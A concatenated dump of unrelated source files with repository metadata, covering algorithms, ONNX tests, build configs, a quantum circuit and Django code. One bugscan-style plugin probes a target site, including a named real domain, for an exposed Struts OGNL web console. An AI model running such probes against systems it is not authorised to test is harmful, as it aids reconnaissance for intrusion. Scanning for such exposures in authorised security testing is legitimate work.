# Simulate a given dfa with a given input.
# dfaString: ASCII description of the dfa M to be simulated
# inString: the initial content I of M's tape
# returns: 'yes' if M accepts I and 'no' otherwise
# Example:
# >>> simulateDfa(rf('multipleOf5.dfa'), '3425735')
# 'yes'
import utils; from utils import rf; from turingMachine import TuringMachine
import re, sys; from dfa import Dfa
def simulateDfa(dfaString, inString):
tm = Dfa(dfaString)
tm.reset(inString)
tmResult = tm.run()
return tmResult
# see testCheckDfa() in checkTuringMachine.py for more detailed tests
def testSimulateDfa():
for (filename, inString, val) in [
('containsGAGA.dfa', 'CCCCCCCCCAAAAAA', 'no'),
('containsGAGA.dfa', 'CCCGAGACCAAAAAA', 'yes'),
('multipleOf5.dfa', '12345', 'yes'),
('multipleOf5.dfa', '1234560', 'yes'),
('multipleOf5.dfa', '123456', 'no'),
]:
result = simulateDfa(rf(filename), inString)
utils.tprint('filename:', filename, 'inString:', inString, 'result:', result)
assert val == result
|
[
"[email protected]"
] | |
e92b6a0a8f15c772f6a3f238232ce0d47afa3a9f
|
ee87e89befa0d4bf353dcf682b6467f9daaf657e
|
/src/foo_ext/setup_foo.py
|
00cab0b82444aae83ea486fa9f58bec6a8b7de40
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
umedoblock/fugou
|
43046056ce5f20b81d76e3c8e3149717b63708ed
|
45d95f20bba6f85764fb686081098d92fc8cdb20
|
refs/heads/master
| 2021-07-15T15:26:30.856753 | 2018-11-26T23:44:18 | 2018-11-26T23:44:18 | 152,105,228 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 639 |
py
|
from distutils.core import setup, Extension
# module_camellia = Extension('camellia', sources = ['camellia/pycamellia.c'])
module_foo = \
Extension('_foo',
sources = ['foo/pyfoo.c'],
extra_link_args=['-Wl,-soname,build/lib.linux-i686-3.2-pydebug/_foo.cpython-32dm.so'])
# build/lib.linux-i686-3.2-pydebug/_foo.cpython-32dm.so
# extra_compile_args=[''])
setup( name = 'sample',
version = '0.0',
author = '梅濁酒(umedoblock)',
author_email = '[email protected]',
url = 'empty',
description = 'This is a foo object package',
ext_modules = [module_foo])
|
[
"devnull@localhost"
] |
devnull@localhost
|
ff10aab701873a6743c66ff43a452b141e61b2e3
|
d153c170a4839deb4d8606009be15198418aea69
|
/알고리즘풀이/21.07.09/벽부수고이동.py
|
9a0c96664f8cbc835b7ed167735d13703b0e7b60
|
[] |
no_license
|
rlatmd0829/algorithm
|
669085907e2243b4c3a663feab87cd83ff50cc49
|
116bebf16afa6e20d9e968aa312b99b8eea447a5
|
refs/heads/master
| 2023-08-21T02:27:36.944919 | 2021-09-26T09:39:52 | 2021-09-26T09:39:52 | 345,480,784 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,533 |
py
|
# Attempt 1: brute force -- re-run BFS once per removable wall; exceeds the time limit (TLE)
import collections
n, m = map(int, input().split())
graph = [list(map(int,input())) for _ in range(n)]
dx, dy = [-1,1,0,0], [0,0,-1,1]
def bfs():
queue = collections.deque()
queue.append((0,0))
distance = [[0]*m for _ in range(n)]
while queue:
x, y = queue.popleft()
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if 0 <= nx < n and 0 <= ny < m:
if graph[nx][ny] == 0 and distance[nx][ny] == 0:
distance[nx][ny] = distance[x][y] + 1
queue.append((nx,ny))
return distance[n-1][m-1]
result = []
for i in range(n):
for j in range(m):
if graph[i][j] == 1:
graph[i][j] = 0
demo = bfs()
if demo != 0:
result.append(demo)
graph[i][j] = 1
if result:
print(min(result)+1)
else:
print(-1)
################## Attempt 2: a single BFS over (x, y, walls_broken) states
from sys import stdin
from collections import deque
N,M = map(int, stdin.readline().split(" "))
grid = [list(map(int, stdin.readline().strip())) for _ in range(N)]  # named 'grid' to avoid shadowing the builtin map()
# offsets for stepping in the four directions
dx = [-1,1,0,0]
dy = [0,0,1,-1]
curMin = 1000000
def bfs():
global curMin
    # distances[x][y][b]: shortest path length reaching (x, y) with b walls broken; -1 marks unvisited
distances = [[[-1]*2 for _ in range(M)] for _ in range(N)]
    # BFS queue of (x, y, walls_broken) states
queue = deque()
queue.append((0,0,0))
distances[0][0][0] = 1
while queue:
x, y, broken = queue.popleft()
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
            if 0 <= nx < N and 0 <= ny < M:
                # case 1: the next cell is empty -- move on without breaking a wall
                if grid[nx][ny] == 0 and distances[nx][ny][broken] == -1:
distances[nx][ny][broken] = distances[x][y][broken]+1
queue.append((nx,ny,broken))
                # case 2: the next cell is a wall -- we may pass only by breaking it:
                #   no wall may have been broken yet, the cell must actually be a wall,
                #   and the (nx, ny, broken=1) state must still be unvisited
                elif broken == 0 and grid[nx][ny] == 1 and distances[nx][ny][1] == -1:
distances[nx][ny][1] = distances[x][y][0]+1
queue.append((nx,ny,1))
if distances[N-1][M-1][0] != -1:
curMin = min(curMin, distances[N-1][M-1][0])
if distances[N-1][M-1][1] != -1:
curMin = min(curMin, distances[N-1][M-1][1])
bfs()
if curMin == 1000000:
print(-1)
else:
print(curMin)
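# Key idea of the accepted solution above: BFS over (x, y, walls_broken) states,
# so each cell is visited at most twice (once per value of the broken flag)
# instead of re-running a whole BFS for every wall as in attempt 1.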
|
[
"[email protected]"
] | |
6053712f6528d72f50dd12642f249150218a7d4c
|
651a296c8f45b5799781fd78a6b5329effe702a0
|
/bvec/bvec_print.py
|
a927d2db4dfdd041e9b0fa3dbdc83056ccf7b51a
|
[] |
no_license
|
pdhhiep/Computation_using_Python
|
095d14370fe1a01a192d7e44fcc81a52655f652b
|
407ed29fddc267950e9860b8bbd1e038f0387c97
|
refs/heads/master
| 2021-05-29T12:35:12.630232 | 2015-06-27T01:05:17 | 2015-06-27T01:05:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,944 |
py
|
#!/usr/bin/env python
def bvec_print ( n, bvec, title ) :
#*****************************************************************************80
#
## BVEC_PRINT prints a binary integer vector, with an optional title.
#
# Discussion:
#
# A BVEC is an integer vector of binary digits, intended to
# represent an integer. BVEC(1) is the units digit, BVEC(N-1)
# is the coefficient of 2^(N-2), and BVEC(N) contains sign
# information. It is 0 if the number is positive, and 1 if
# the number is negative.
#
# The vector is printed "backwards", that is, the first entry
# printed is BVEC(N).
#
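#  For example, with N = 4 the vector BVEC = [1, 0, 1, 0] represents
#  +(1*1 + 0*2 + 1*4) = 5 (the final 0 marks a positive value), and it
#  is printed backwards as: 0 1 0 1.
#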
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 24 December 2014
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# Input, integer N, the number of components of the vector.
#
# Input, integer BVEC(N), the vector to be printed.
#
# Input, character ( len = * ) TITLE, a title to be printed first.
# TITLE may be blank.
#
if ( 0 < len ( title ) ):
print ''
print title
for ihi in range ( n - 1, -1, -70 ):
ilo = max ( ihi - 70, -1 )
print ' ',
    for i in range ( ihi, ilo, -1 ):
print '%1d' % ( bvec[i] ),
print ''
return
def bvec_print_test ( ):
#*****************************************************************************80
#
## BVEC_PRINT_TEST tests BVEC_PRINT.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 24 December 2014
#
# Author:
#
# John Burkardt
#
import numpy as np
n = 10
bvec = np.array ( [ 1, 0, 0, 1, 0, 1, 1, 1, 0, 0 ] )
print ''
print 'BVEC_PRINT_TEST'
print ' BVEC_PRINT prints a binary vector.'
bvec_print ( n, bvec, ' BVEC:' )
print ''
print 'BVEC_PRINT_TEST'
print ' Normal end of execution.'
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
bvec_print_test ( )
timestamp ( )
|
[
"[email protected]"
] | |
1539d348092bab286434a5b073c5490382d7dffe
|
9f4b1884273f995806c1e755665a92b785cc52a8
|
/onnx/test/parser_test.py
|
46604593e0c848bd177032dfeda4264980d26494
|
[
"Apache-2.0"
] |
permissive
|
zhijl/onnx
|
340f7c5794a9aca96d2a9e76c3336aeebe798776
|
ac0afea916f989c714692dd8551eff762a639cd5
|
refs/heads/main
| 2023-03-31T02:30:50.151799 | 2023-03-20T23:09:55 | 2023-03-20T23:09:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,295 |
py
|
# SPDX-License-Identifier: Apache-2.0
import unittest
from parameterized import parameterized
import onnx
from onnx import GraphProto, OperatorSetIdProto, checker
class TestBasicFunctions(unittest.TestCase):
def check_graph(self, graph: GraphProto) -> None:
self.assertEqual(len(graph.node), 3)
self.assertEqual(graph.node[0].op_type, "MatMul")
self.assertEqual(graph.node[1].op_type, "Add")
self.assertEqual(graph.node[2].op_type, "Softmax")
def test_parse_graph(self) -> None:
input = """
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
graph = onnx.parser.parse_graph(input)
self.check_graph(graph)
def test_parse_model(self) -> None:
input = """
<
ir_version: 7,
opset_import: [ "" : 10, "com.microsoft": 1]
>
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
model = onnx.parser.parse_model(input)
self.assertEqual(model.ir_version, 7)
self.assertEqual(len(model.opset_import), 2)
self.check_graph(model.graph)
def test_parse_graph_error(self) -> None:
input = """
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul[X, W]
S = Add(T, B)
C = Softmax(S)
}
"""
self.assertRaises(
onnx.parser.ParseError, lambda: onnx.parser.parse_graph(input)
)
def test_parse_model_error(self) -> None:
input = """
<
ir_version: 7,
opset_import: [ "" : 10 "com.microsoft": 1]
>
agraph (float[N, 128] X, float[128,10] W, float[10] B) => (float[N] C)
{
T = MatMul(X, W)
S = Add(T, B)
C = Softmax(S)
}
"""
self.assertRaises(
onnx.parser.ParseError, lambda: onnx.parser.parse_model(input)
)
def test_parse_function_with_attributes(self) -> None:
input = """
<
ir_version: 9,
opset_import: [ "" : 15, "custom_domain" : 1],
producer_name: "FunctionProtoTest",
producer_version: "1.0",
model_version: 1,
doc_string: "A test model for model local functions."
>
agraph (float[N] x) => (float[N] out)
{
out = custom_domain.Selu<alpha=2.0, gamma=3.0>(x)
}
<
domain: "custom_domain",
opset_import: [ "" : 15],
doc_string: "Test function proto"
>
Selu
<alpha: float=1.67326319217681884765625, gamma: float=1.05070102214813232421875>
(X) => (C)
{
constant_alpha = Constant<value_float: float=@alpha>()
constant_gamma = Constant<value_float: float=@gamma>()
alpha_x = CastLike(constant_alpha, X)
gamma_x = CastLike(constant_gamma, X)
exp_x = Exp(X)
alpha_x_exp_x = Mul(alpha_x, exp_x)
alpha_x_exp_x_ = Sub(alpha_x_exp_x, alpha_x)
neg = Mul(gamma_x, alpha_x_exp_x_)
pos = Mul(gamma_x, X)
_zero = Constant<value_float=0.0>()
zero = CastLike(_zero, X)
less_eq = LessOrEqual(X, zero)
C = Where(less_eq, neg, pos)
}
"""
model = onnx.parser.parse_model(input)
checker.check_model(model)
@parameterized.expand(
[
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu(x) }",
{},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<alpha=2.0>(x) }",
{"alpha": 2.0},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<gamma=3.0>(x) }",
{"gamma": 3.0},
),
(
"agraph (float[N] x) => (float[N] out) { out = custom_domain.Selu<alpha=2.0, gamma=3.0>(x) }",
{"alpha": 2.0, "gamma": 3.0},
),
]
)
def test_composite_parse_function_with_attributes(
self, graph_text: str, expected_attribute: dict
) -> None:
default_alpha = 1.67326319217681884765625
default_gamma = 1.05070102214813232421875
def expect_custom_node_attribute(node, attributes):
for key in attributes:
match_attr = [attr for attr in node.attribute if attr.name == key]
assert len(match_attr) == 1
assert match_attr[0].f == attributes[key]
def expect_model_function_attribute(model):
assert len(model.functions[0].attribute_proto) == 2
attr_proto_alpha = [
attr_proto
for attr_proto in model.functions[0].attribute_proto
if attr_proto.name == "alpha"
]
assert len(attr_proto_alpha) == 1 and attr_proto_alpha[0].f == default_alpha
attr_proto_gamma = [
attr_proto
for attr_proto in model.functions[0].attribute_proto
if attr_proto.name == "gamma"
]
assert len(attr_proto_gamma) == 1 and attr_proto_gamma[0].f == default_gamma
function_text = f"""
<
domain: "custom_domain",
opset_import: [ "" : 15],
doc_string: "Test function proto"
>
Selu
<alpha: float={default_alpha}, gamma: float={default_gamma}>
(X) => (C)
{{
constant_alpha = Constant<value_float: float=@alpha>()
constant_gamma = Constant<value_float: float=@gamma>()
alpha_x = CastLike(constant_alpha, X)
gamma_x = CastLike(constant_gamma, X)
exp_x = Exp(X)
alpha_x_exp_x = Mul(alpha_x, exp_x)
alpha_x_exp_x_ = Sub(alpha_x_exp_x, alpha_x)
neg = Mul(gamma_x, alpha_x_exp_x_)
pos = Mul(gamma_x, X)
_zero = Constant<value_float=0.0>()
zero = CastLike(_zero, X)
less_eq = LessOrEqual(X, zero)
C = Where(less_eq, neg, pos)
}}
"""
functions = [onnx.parser.parse_function(function_text)]
graph = onnx.parser.parse_graph(graph_text)
opset_imports = [
OperatorSetIdProto(domain="", version=15),
OperatorSetIdProto(domain="custom_domain", version=1),
]
model = onnx.helper.make_model(
graph, functions=functions, opset_imports=opset_imports
)
checker.check_model(model)
expect_model_function_attribute(model)
expect_custom_node_attribute(model.graph.node[0], expected_attribute)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
f4a8e3c81ba011c641b4218d7ed3cca00179f752
|
e0c8662a56d89730043146ddc340e9e0b9f7de72
|
/plugin/14e55cec-1596.py
|
7b13f9266669dc060f05fe19bfca14b9054da31c
|
[] |
no_license
|
izj007/bugscan_poc
|
f2ef5903b30b15c230b292a1ff2dc6cea6836940
|
4490f3c36d4033bdef380577333722deed7bc758
|
refs/heads/master
| 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 720 |
py
|
#coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
"""
POC Name : OGNL console
Author : a
mail : [email protected]
Referer: http://wooyun.org/bugs/wooyun-2010-080076
"""
import urlparse
def assign(service, arg):
if service == 'www':
arr = urlparse.urlparse(arg)
return True, '%s://%s/' % (arr.scheme, arr.netloc)
def audit(arg):
payload = '/struts/webconsole.html'
url = arg + payload
code, head, res, errcode, _ = curl.curl('"%s"' % url)
if code == 200 and "Welcome to the OGNL console" in res:
security_info('find ognl console:' +url)
if __name__ == '__main__':
from dummy import *
audit(assign('www', 'http://www.homilychart.com/')[1])
|
[
"[email protected]"
] | |
8787aeb0950cc8d74bb12753045c0ae4d10b16e6
|
17c280ade4159d4d8d5a48d16ba3989470eb3f46
|
/18/mc/ExoDiBosonResonances/EDBRTreeMaker/test/crab3_analysisWprime1800.py
|
9e802f49450f00b24370cdff361d92b3565fac2c
|
[] |
no_license
|
chengchen1993/run2_ntuple
|
798ff18489ff5185dadf3d1456a4462e1dbff429
|
c16c2b203c05a3eb77c769f63a0bcdf8b583708d
|
refs/heads/master
| 2021-06-25T18:27:08.534795 | 2021-03-15T06:08:01 | 2021-03-15T06:08:01 | 212,079,804 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,082 |
py
|
from WMCore.Configuration import Configuration
config = Configuration()
config.section_("General")
config.General.requestName = 'Wprime_1800_weight_v2'
config.General.transferLogs = True
config.section_("JobType")
config.JobType.pluginName='Analysis'
config.JobType.sendExternalFolder = True
config.JobType.inputFiles = ['Autumn18_V19_MC_L1FastJet_AK4PFchs.txt','Autumn18_V19_MC_L2Relative_AK4PFchs.txt','Autumn18_V19_MC_L3Absolute_AK4PFchs.txt','Autumn18_V19_MC_L1FastJet_AK8PFchs.txt','Autumn18_V19_MC_L2Relative_AK8PFchs.txt','Autumn18_V19_MC_L3Absolute_AK8PFchs.txt','Autumn18_V19_MC_L1FastJet_AK8PFPuppi.txt','Autumn18_V19_MC_L2Relative_AK8PFPuppi.txt','Autumn18_V19_MC_L3Absolute_AK8PFPuppi.txt','Autumn18_V19_MC_L1FastJet_AK4PFPuppi.txt','Autumn18_V19_MC_L2Relative_AK4PFPuppi.txt','Autumn18_V19_MC_L3Absolute_AK4PFPuppi.txt']
#config.JobType.inputFiles = ['PHYS14_25_V2_All_L1FastJet_AK4PFchs.txt','PHYS14_25_V2_All_L2Relative_AK4PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK4PFchs.txt','PHYS14_25_V2_All_L1FastJet_AK8PFchs.txt','PHYS14_25_V2_All_L2Relative_AK8PFchs.txt','PHYS14_25_V2_All_L3Absolute_AK8PFchs.txt']
# Name of the CMSSW configuration file
#config.JobType.psetName = 'bkg_ana.py'
config.JobType.psetName = 'analysis.py'
#config.JobType.allowUndistributedCMSSW = True
config.JobType.allowUndistributedCMSSW = True
config.section_("Data")
#config.Data.inputDataset = '/WJetsToLNu_13TeV-madgraph-pythia8-tauola/Phys14DR-PU20bx25_PHYS14_25_V1-v1/MINIAODSIM'
config.Data.inputDataset = '/WprimeToWZToWlepZhad_narrow_M-1800_13TeV-madgraph/RunIISummer16MiniAODv2-PUMoriond17_80X_mcRun2_asymptotic_2016_TrancheIV_v6-v1/MINIAODSIM'
config.Data.inputDBS = 'global'
#config.Data.inputDBS = 'phys03'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob =10
config.Data.totalUnits = -1
config.Data.publication = False
# This string is used to construct the output dataset name
config.Data.outputDatasetTag = 'Wprime_1800_weight_v2'
config.section_("Site")
# Where the output files will be transmitted to
config.Site.storageSite = 'T2_CH_CERN'
|
[
"[email protected]"
] | |
76c6d426ea19c82ba2d57cfb8810ec4fedfbf1d8
|
f03f7f4cad663f4687b8b87ea9a001cd7a0c6b31
|
/rule_engine/asgi.py
|
626b087bf951a5d79ee0f8275ef1dc902482b7ec
|
[] |
no_license
|
amarbabuk/rule-engine
|
79f05a2338539a8791aaea3a0432e4b8a1a7d1d3
|
9b7a504501d2db02178e4bbeac0409dfd0ba4833
|
refs/heads/master
| 2023-05-03T20:40:01.259232 | 2021-05-15T21:24:18 | 2021-05-15T21:24:18 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 399 |
py
|
"""
ASGI config for rule_engine project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rule_engine.settings')
application = get_asgi_application()
|
[
"[email protected]"
] | |
669563710a76da0b0965af59920ba5fa960381db
|
a1f009fbc7700cd17fffcd97518bda1593064e33
|
/source_code/python/python_advanced/strings/bytes.py
|
b6ee415eaff9935b7df255dd1b656f9772eacbb5
|
[] |
no_license
|
Alrin12/ComputerScienceSchool
|
2db06f9d198f67ad587535b3cab0dabd8a4b8e5c
|
7543ae686394fc573f80bf680ae4371a2871dede
|
refs/heads/master
| 2021-01-23T15:04:22.672139 | 2017-07-17T15:32:31 | 2017-07-17T15:32:31 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
b = b"abcde"
#print(b)
#print(b.upper())
#print(b.startswith(b"ab"))
#bytes -> string
string = b.decode('UTF-8')
print(string)
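# string -> bytes (the reverse of decode):
# data = string.encode('UTF-8')
# print(data)  # b'abcde'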
|
[
"[email protected]"
] | |
cbabaab8f53d23cfaa2ecbf319388276b6172f67
|
433d8d457ed431b9ad38e3ed8ed6e441b7caa334
|
/bin/generate_zippylog_message_classes
|
92c4f25b4a7ff5fa92a47278254795a8f91aaf8f
|
[
"Apache-2.0"
] |
permissive
|
indygreg/zippylog
|
365f4f95dd2c9f8743180178fa90d66b0611cc71
|
5efc10b28a3e9d5f4df6c2014e7121d689291a70
|
refs/heads/master
| 2020-05-09T17:15:23.063121 | 2012-09-06T23:53:19 | 2012-09-06T23:53:19 | 795,523 | 8 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,674 |
#!/usr/bin/python
# Copyright 2011 Gregory Szorc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# this script is meant to be used by zippylog developers only.
# it generates the autogenerated protocol buffer classes for the messages
# defined by zippylog itself
# it is assumed this script is executed from within a source distribution
from json import dump, load
from os import walk
from os.path import exists, join, dirname, splitext
from shutil import copy2, rmtree
from subprocess import Popen
from sys import path
from tempfile import mkdtemp
base_dir = dirname(dirname(__file__))
path.insert(0, join(base_dir, 'lib', 'py'))
proto_dir = join(base_dir, 'proto')
zippylog_compile = join(base_dir, 'bin', 'zippylog_compile')
state_file = join(proto_dir, 'zippylog-state.json')
out_dir = mkdtemp()
print 'temp output directory: %s' % out_dir
if exists(state_file):
copy2(state_file, join(out_dir, 'zippylog-state.json'))
compile_args = [ zippylog_compile, '--cpp-namespace', 'zippylog' ]
compile_args.append(proto_dir)
compile_args.append(out_dir)
p = Popen(compile_args)
if p.wait() != 0:
print 'zippylog_compile did not execute successfully'
exit(1)
copy2(join(out_dir, 'zippylog-state.json'), state_file)
for root, dirs, files in walk(join(out_dir, 'py', 'zippylog')):
for f in filter(lambda x: x[-3:] == '.py', files):
src = join(root, f)
dst = src[len(out_dir)+1:]
copy2(src, join(base_dir, 'lib', dst))
for root, dirs, files in walk(join(out_dir, 'cpp', 'zippylog')):
for f in filter(lambda x: splitext(x)[1] in ['.h', '.hpp', '.cc', '.cpp'], files):
src = join(root, f)
dst = src[len(out_dir)+5:]
copy2(src, join(base_dir, 'src', dst))
for root, dirs, files in walk(join(out_dir, 'lua', 'zippylog')):
for f in filter(lambda x: splitext(x)[1] in ['.h', '.cc'], files):
src = join(root, f)
dst = src[len(out_dir)+5:]
copy2(src, join(base_dir, 'src', dst))
copy2(join(out_dir, 'lua', 'lua-protobuf.h'), join(base_dir, 'src', 'lua-protobuf.h'))
copy2(join(out_dir, 'lua', 'lua-protobuf.cc'), join(base_dir, 'src', 'lua-protobuf.cc'))
rmtree(out_dir)
|
[
"[email protected]"
] | ||
14fcaeb305d053f5521da45fd3ee2dd1a9697fba
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/data/p3BR/R1/benchmark/startCirq155.py
|
094f1a6799a76414621d8cdf570c3e79f509ea54
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,673 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=29
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.rx(-0.09738937226128368).on(input_qubit[2])) # number=2
c.append(cirq.H.on(input_qubit[1])) # number=3
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=15
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[1])) # number=19
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=20
c.append(cirq.H.on(input_qubit[1])) # number=21
c.append(cirq.H.on(input_qubit[1])) # number=26
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=27
c.append(cirq.H.on(input_qubit[1])) # number=28
c.append(cirq.X.on(input_qubit[1])) # number=23
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=18
c.append(cirq.Z.on(input_qubit[1])) # number=11
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=12
c.append(cirq.Y.on(input_qubit[1])) # number=14
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[1])) # number=6
c.append(cirq.Z.on(input_qubit[1])) # number=8
c.append(cirq.X.on(input_qubit[1])) # number=7
c.append(cirq.rx(-2.42845112122491).on(input_qubit[1])) # number=25
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq155.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
|
[
"[email protected]"
] | |
627cf8253da28f9a0b598a5ce5132606b0f3c62b
|
a1431c25ebd62daead742e0120a16253c4cf67ca
|
/django/movie/migrations/0002_auto_20190910_2053.py
|
212f7307d9b37543ceb71c884a998090b3067fed
|
[] |
no_license
|
KonradMarzec1991/my_MDB
|
f840cbf495c23272b3e39db68c241219a60d63bd
|
d77339a4c37a3d7ae21b6d28bd9644ce15130f10
|
refs/heads/master
| 2022-04-29T10:15:37.109422 | 2019-11-03T20:13:57 | 2019-11-03T20:13:57 | 207,375,063 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,230 |
py
|
# Generated by Django 2.2.5 on 2019-09-10 20:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('movie', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=140)),
('last_name', models.CharField(max_length=140)),
('born', models.DateField()),
('died', models.DateField(blank=True, null=True)),
],
options={
'ordering': ('last_name', 'first_name'),
},
),
migrations.AlterModelOptions(
name='movie',
options={'ordering': ('-year', 'title')},
),
migrations.CreateModel(
name='Role',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=140)),
('movie', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='movie.Movie')),
('person', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='movie.Person')),
],
options={
'unique_together': {('movie', 'person', 'name')},
},
),
migrations.AddField(
model_name='movie',
name='actors',
field=models.ManyToManyField(blank=True, related_name='acting_credits', through='movie.Role', to='movie.Person'),
),
migrations.AddField(
model_name='movie',
name='director',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='directed', to='movie.Person'),
),
migrations.AddField(
model_name='movie',
name='writers',
field=models.ManyToManyField(blank=True, related_name='writing_credits', to='movie.Person'),
),
]
|
[
"[email protected]"
] | |
ca059aa8c32a39ed214dc0199c72e92922850c57
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02677/s955369222.py
|
6cf51b7ad9b75384f56164aff5faa203ac653ac3
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 465 |
py
|
"""AtCoder."""
import math
a, b, h, m = [int(v) for v in input().split(' ')]
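# Model each hand tip as a point on a circle rotating at angular speed w = 2*pi / period,
# where the hour hand's period is 12*60 minutes and the minute hand's is 60 minutes.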
class Point:
def __init__(self, r, v):
self.r = r
self.w = (2 * math.pi) / v
def get_pos(self, t):
wt = self.w * t
return self.r * math.cos(wt), self.r * math.sin(wt)
p1 = Point(a, 12 * 60)
p2 = Point(b, 60)
minute = (h * 60) + m
x1, y1 = p1.get_pos(minute)
x2, y2 = p2.get_pos(minute)
print(math.sqrt(pow(x1 - x2, 2) + pow(y1 - y2, 2)))
|
[
"[email protected]"
] | |
2f5a0fdf8f81ef767fc19d5a34d2bbaeb635d01d
|
646f2a135dc8ba97b2fc7436194dcab2a8f0ae8c
|
/autocomplete_light/channel/base.py
|
8ba3f984df5a1c0a22922c1c42937c3567e22822
|
[
"MIT"
] |
permissive
|
pix0r/django-autocomplete-light
|
9f55252d4aa4fb8a28471772a98e793b171cdb0c
|
f1026dfe49934065206ca1fdae46289c68e8c231
|
refs/heads/master
| 2020-12-30T18:50:36.304623 | 2012-05-30T09:39:24 | 2012-05-30T09:39:24 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,932 |
py
|
"""
The channel.base module provides a channel class which you can extend to make
your own channel. It also serves as default channel class.
"""
from django.core import urlresolvers
from django.template import loader
